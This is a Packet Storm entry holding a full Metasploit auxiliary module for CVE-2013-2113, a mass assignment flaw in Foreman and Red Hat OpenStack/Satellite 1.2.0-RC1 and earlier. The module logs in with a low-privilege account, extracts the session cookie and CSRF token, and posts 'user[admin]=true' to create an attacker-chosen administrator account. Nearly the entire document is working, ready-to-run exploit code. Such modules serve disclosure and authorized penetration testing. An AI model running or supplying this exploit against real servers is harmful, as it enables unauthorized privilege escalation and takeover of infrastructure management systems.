Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment

2013-08-21T00:00:00
ID PACKETSTORM:122897
Type packetstorm
Reporter Ramon de C Valle
Modified 2013-08-21T00:00:00

Description

                                        
                                            `##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
  
class Metasploit4 < Msf::Auxiliary  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize  
super(  
'Name' => 'Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment',  
'Description' => %q{  
This module exploits a mass assignment vulnerability in the 'create'  
action of 'users' controller of Foreman and Red Hat OpenStack/Satellite  
(Foreman 1.2.0-RC1 and earlier) by creating an arbitrary administrator  
account. For this exploit to work, your account must have 'create_users'  
permission (e.g., Manager role).  
},  
'Author' => 'Ramon de C Valle',  
'License' => MSF_LICENSE,  
'References' =>  
[  
['BID', '60835'],  
['CVE', '2013-2113'],  
['CWE', '915'],  
['OSVDB', '94655'],  
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=966804'],  
['URL', 'http://projects.theforeman.org/issues/2630']  
],  
'DisclosureDate' => 'Jun 6 2013'  
)  
  
register_options(  
[  
Opt::RPORT(443),  
OptBool.new('SSL', [true, 'Use SSL', true]),  
OptString.new('USERNAME', [true, 'Your username']),  
OptString.new('PASSWORD', [true, 'Your password']),  
OptString.new('NEWUSERNAME', [true, 'The username of the new admin account']),  
OptString.new('NEWPASSWORD', [true, 'The password of the new admin account']),  
OptString.new('NEWEMAIL', [true, 'The email of the new admin account']),  
OptString.new('TARGETURI', [ true, 'The path to the application', '/']),  
], self.class  
)  
end  
  
def run  
print_status("Logging into #{target_url}...")  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'users', 'login'),  
'vars_post' => {  
'login[login]' => datastore['USERNAME'],  
'login[password]' => datastore['PASSWORD']  
}  
)  
  
if res.nil?  
print_error('No response from remote host')  
return  
end  
  
if res.headers['Location'] =~ /users\/login$/  
print_error('Authentication failed')  
return  
else  
session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/  
  
if session.nil?  
print_error('Failed to retrieve the current session id')  
return  
end  
end  
  
print_status('Retrieving the CSRF token for this session...')  
res = send_request_cgi(  
'cookie' => "_session_id=#{session}",  
'method' => 'GET',  
'uri' => normalize_uri(target_uri)  
)  
  
if res.nil?  
print_error('No response from remote host')  
return  
end  
  
if res.headers['Location'] =~ /users\/login$/  
print_error('Failed to retrieve the CSRF token')  
return  
else  
csrf_param = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-param"[ ]*\/?>/i  
csrf_token = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-token"[ ]*\/?>/i  
  
if csrf_param.nil? || csrf_token.nil?  
csrf_param = $1 if res.body =~ /<meta[ ]+name="csrf-param"[ ]+content="(.*)"[ ]*\/?>/i  
csrf_token = $1 if res.body =~ /<meta[ ]+name="csrf-token"[ ]+content="(.*)"[ ]*\/?>/i  
end  
  
if csrf_param.nil? || csrf_token.nil?  
print_error('Failed to retrieve the CSRF token')  
return  
end  
end  
  
print_status("Sending create-user request to #{target_url('users')}...")  
res = send_request_cgi(  
'cookie' => "_session_id=#{session}",  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'users'),  
'vars_post' => {  
csrf_param => csrf_token,  
'user[admin]' => 'true',  
'user[auth_source_id]' => '1',  
'user[login]' => datastore['NEWUSERNAME'],  
'user[mail]' => datastore['NEWEMAIL'],  
'user[password]' => datastore['NEWPASSWORD'],  
'user[password_confirmation]' => datastore['NEWPASSWORD']  
}  
)  
  
if res.nil?  
print_error('No response from remote host')  
return  
end  
  
if res.headers['Location'] =~ /users$/  
print_good('User created successfully')  
else  
print_error('Failed to create user')  
end  
end  
  
def target_url(*args)  
(ssl ? 'https' : 'http') +  
if rport.to_i == 80 || rport.to_i == 443  
"://#{vhost}"  
else  
"://#{vhost}:#{rport}"  
end + normalize_uri(target_uri.path, *args)  
end  
end  
`